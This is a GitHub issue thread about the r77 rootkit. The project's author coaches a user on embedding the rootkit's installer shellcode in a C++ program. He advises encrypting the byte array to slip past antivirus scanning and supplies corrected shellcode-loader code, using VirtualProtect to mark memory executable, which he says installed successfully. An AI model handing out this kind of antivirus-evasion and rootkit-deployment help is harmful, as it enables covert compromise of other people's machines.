Closed Summ3rM0 closed 6 months ago
Summ3rM0
commented
7 months ago My point is, I've gone through the C++ sample files included in the compressed folder, but I'm unclear on how to use them. For instance, how do I integrate the content of the shellcode into a C++ program?
bytecode77
commented
7 months ago When you integrate r77 into your program, you need to run the installer only once. If you want to install a newer version of r77, then you need to run the installer again. But anyways, the installer really needs to be executed only once, i.e. within the installation procedure of your application.
Install.exe is the installer that you would write to disk and run. However, once you write it to the disk, it will be discovered by AV.
Install.shellcode is a wrapper around Install.exe. The provided example is the AV evasive alternative to ShellExecute("Install.exe", ...)
From InstallShellCode.cpp
// 1. Load Install.shellcode from resources or from a BYTE[]
// Ideally, encrypt the file and decrypt it here to avoid scantime detection.
LPBYTE shellCode = ...You need to put the file Install.shellcode into your executable's resources, or place it in an array, such as
unsigned char *shellCode = { 0x12, 0x34, 0x56, 0x78, ........ }And since you try to evade AV, you certainly need to do at leasts some trivial encryption on that byte array, otherwise AV will find the signatures of the installer within your executable...
Summ3rM0
commented
7 months ago Thank you, dear author. I still don't quite understand how to convert the on-disk install.shellcode file to a byte array and embed it into the c program. Do I convert the file to hexadecimal format and assign it to the shellCode variable? And, if it doesn't bother you, and you're happy to give me some advice... How would you encrypt this byte array? I am very sorry, my original purpose of learning c language is to participate in computer competitions rather than to write such programs, so I am not very experienced. If you can give me a little help, I would really appreciate it
Summ3rM0
commented
7 months ago One more small question: if I embed install.shellcode into my c program, do I need administrator privileges to run it?
bytecode77
commented
7 months ago You always need elevated privileges to install r77. If you're learning to program, then maybe converting a file into a hexadecimal array could be a good excercise 👍
Summ3rM0
commented
7 months ago int main() { unsigned char shellCode[] = {0x12};//Here is the content of the shellcode unsigned int shellCodeSize = 167320; DWORD oldProtect; VirtualProtect(shellCode, shellCodeSize, PAGE_EXECUTE_READWRITE, &oldProtect); ((void(*)())shellCode)(); return 0; } After I run it as an administrator, it doesn't work, can you help me see the problem?
bytecode77
commented
7 months ago I tried it out to see whether it works. First off, I get a compile error 'type cast': cannot convert from 'BYTE [167320]' to 'void (__cdecl *)(void)'
So I just quickly changed the code to copy the buffer first. Installation worked.
LPBYTE copy = new BYTE[167320];
memcpy(copy, shellCode, 167320);
DWORD oldProtect;
VirtualProtect(copy, 167320, PAGE_EXECUTE_READWRITE, &oldProtect);
((void(*)())copy)();If it doesn't work for you, ...
Dear esteemed program author,
I hope this message finds you well. I'm reaching out once again with a question that has lingered in my mind for quite some time. Your expertise is renowned, and I am truly grateful for any guidance you can offer.
I've been struggling to comprehend how to utilize your shellcode in C++. This topic has been a maze for me, and your insight would be invaluable. If you could spare a moment to provide an example or any direction, it would mean the world to me.
Thank you immensely for considering my query.
Warm regards